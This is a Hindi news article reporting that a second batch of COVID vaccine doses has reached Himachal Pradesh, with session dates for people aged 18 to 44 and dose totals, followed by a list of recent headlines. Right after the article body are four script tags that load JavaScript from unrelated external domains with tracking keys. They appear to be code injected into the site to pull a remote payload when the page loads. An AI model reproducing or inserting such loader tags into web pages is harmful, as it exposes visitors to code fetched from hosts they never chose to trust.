Categories: हिमाचल

हिमाचल पहुंची कोरोना वैक्सीन की दूसरी खेप, 18 से 44 साल के लोगों के लिए वैक्सीन का दूसरा चरण शुरू

<p>हिमाचल प्रदेश में 18 से 44 वर्ष की आयु वर्ग वालों के लिए अब वैक्सीन लगाने में तेज़ी आने की उम्मीद बंधी है। हिमाचल में इस वर्ग के लिए कोरोना वैक्सीन की एक साथ 1,17,830 डोज पहुंच चुकी है। अब इस आयु वर्ग के लिए वैक्सीन पांच दिन तक लगना भी शुरू हो गई है। भारत सरकार के निर्णय के अनुसार राज्य को&nbsp; वैक्सीन की 1,17,830 डोज अलग-अलग चरणों में 16, 26 जून और दो जुलाई को प्राप्त होनी थी, लेकिन अब यह पूरी सप्लाई एक साथ ही प्रदेश में पहुंच गई है। 18 से 44 वर्ष के आयु वर्ग के लाभार्थियों के लिए राज्य सरकार द्वारा खरीदी वैक्सीन की डोज 21 जून से पहले इस वर्ग को लगाई जानी है।</p>

<p>प्रदेश में इस आयु वर्ग के लाभार्थियों के लिए टीकाकरण सत्र 14,15, 16, 17 और 18 जून को होंगे। हिमाचल पहुंची वैक्सीन की सभी खुराकें 21 जून से पहले इस आयु वर्ग के लोगों को लगाई जानी हैं। इसके बाद 18 वर्ष और इससे अधिक आयु वर्ग के लाभार्थियों के लिए टीकाकरण का चौथा चरण भारत सरकार से वैक्सीन की आपूर्ति होने के बाद शुरू किया जाएगा। इससे पहले 18 से 44 वर्ष के आयु वर्ग के लाभार्थियों के लिए टीकाकरण सत्र टीकाकरण वाले दिन से दो दिन पूर्व प्रकाशित 2 बजे से दोपहर बाद 3 बजे के बीच प्रदर्शित किए जाते थे, लेकिन अब वैक्सीन उपलब्ध होने के बाद टीकाकरण सत्र 14,15, 16, 17 और 18 जून को टीकाकरण वाले दिन से एक दिन पूर्व दोपहर 12 से 1 बजे तक प्रदर्शित किए जाएंगे।</p>

<p>मुख्यमंत्री जयराम ठाकुर ने बताया कि जल्द ही कोरोना की वैक्सीन की ओर डोज़ हिमाचल में आएंगी उसके बाद टीकाकरण में तेज़ी आएगी। पहाड़ी प्रदेश हिमाचल में 14 जून तक 18 से 44 आयुवर्ग के 1 लाख 35 हज़ार 597 लोगों को वैक्सीन लगाई गई है। हिमाचल में अभी तक 21 लाख 05 हज़ार 193 को पहली डोज़ दी जा चुकी है। जबकि 4 लाख 38 हज़ार 172 को कोरोना की दोनों डोज़ लग चुकी है। हिमाचल प्रदेश में अभी तक 25 लाख 43 हज़ार 364 लोगों को कोरोना की कुल वैक्सीन लगी है। सूबे में 18 से 44 साल तक के लोगों को अभी पंजीकरण के आधार पर टीका लगाया जा रहा है। लेकिन जल्द ही वैक्सीन की उपलब्धता के बाद बिना पंजीकरण के भी टीका लगाया जा सकेगा।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1623740364410″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Himachal: भाजपा विधायक बिक्रम सिंह ने लौटाई एमएचए की सिक्योरिटी

  धर्मशाला:जसवां प्रागपुर से भाजपा विधायक बिक्रम सिंह ने एमएचए की सिक्योरिटी लौटा दी है।…

5 hours ago

शिलाई में सड़कों पर उतरे हिन्दू संगठनों का प्रदर्शन

  शिलाई में वक्फ बोर्ड व अवैध तरीके से रह रहे लोगों का विरोध Shillai:…

10 hours ago

एयर मार्शल अमर प्रीत सिंह होंगे अगले वायुसेना प्रमुख

  New Delhi: एयर मार्शल अमर प्रीत सिंह को अगले Chief of the Air Staff…

11 hours ago

बंद नहीं अपग्रेड होगा गोपालपुर चिड़ियाघर

  गोपालपुर चिड़ियाघर बंद नहीं होगा। बल्कि अपग्रेड किया जा रहा है। चिड़ियाघर में व्‍यवस्‍थाएं…

11 hours ago

कांगड़ा में दो हादसे:टैंक में तीन मजदूर बेह‍ोश, स्कूल बस और कार से टकराई पंजाब रोड़वेज की बस, एक गंभीर

  धर्मशाला: कांगड़ा में शनिवार को दो हादसे हुए हैं। पहला हादसा बसनूर शाहपुर का…

11 hours ago

पहले खाए बादाम फिर चोरी की वारदात को अंजाम

हमीरपुर के दो संस्थानों में चोरी की वारदात लैपटॉप,नगदी और चांदी के सिक्के हुए चोरी…

12 hours ago